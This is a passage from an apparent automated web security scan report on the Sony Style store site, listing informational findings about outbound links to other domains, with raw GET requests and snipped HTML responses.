<a class="redArrowLink" href="http://www.trackitback.com/backstage/">Learn more</a>
...[SNIP]...
<div class="locatorArea">
<a class="storeListingLink redArrowLink" href="http://www.docs.sony.com/startchat.asp?chat=1">Chat now</a>
...[SNIP]...
etails">
If you have a problem with your hardware, such as your LCD or hard drive, we're the right people to handle it. Most repairs take only 5-7 days from receipt of product. Find out more about our <a href="http://sonyrepairservices.com" target="blank" class="serviceDetailsLink">Sony VAIO Repair Service</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.5. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?cmsId=smb_landing_page&catalogId=10551&storeId=10151&langId=-1 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 84689
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 84689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<div class="seoImage intelI7"><a class="externalCTA" id="promo01_intelI7" rel="processorBadge" target="_new" href="http://syndication.intel.com/DistributeModule.aspx?id=16972">Intel Core i7 - Visibly Smart</a>
...[SNIP]...
<div class="seoImage intelI7"><a class="externalCTA" id="promo02_intelI7" rel="processorBadge" target="_new" href="http://syndication.intel.com/DistributeModule.aspx?id=16972">Intel Core i7 - Visibly Smart</a>
...[SNIP]...
<div class="seoImage intelI7"><a class="externalCTA" id="promo03_intelI7" rel="processorBadge" target="_new" href="http://syndication.intel.com/DistributeModule.aspx?id=16972">Intel Core i7 - Visibly Smart</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.6. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?hideHeaderFooter=false&storeId=10151&catalogId=10551&langId=-1&cmsId=tradeup HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 92247
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 92247


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li>
<a href="http://www.econewonline.com/sonystyle" target="_blank" class="">
<img src="/wcsstore/SonyStyleStorefrontAssetStore/img/static_images/tradein_cta_get_started_111x26.jpg" alt="Get Started" />
...[SNIP]...
</p>
<a class="redArrowLink" href="http://green.sel.sony.com" target="_blank">Learn more</a>
...[SNIP]...
<p class="answer">
A: Trade-in value offers are based on the reuse value of the item you are trading in.
<a href="http://recycling.econewonline.com/sonystyle/?q=main" target="_blank">Click here</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.7. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/SYNewsletterOptInView?storeId=10151&catalogId=10551&langId=-1&XID=M:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 76356
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 76356


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!---->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.8. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYSiteMapView

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/SYSiteMapView?storeId=10151&catalogId=10551&langId=-1 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 165897
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:09 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 165897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
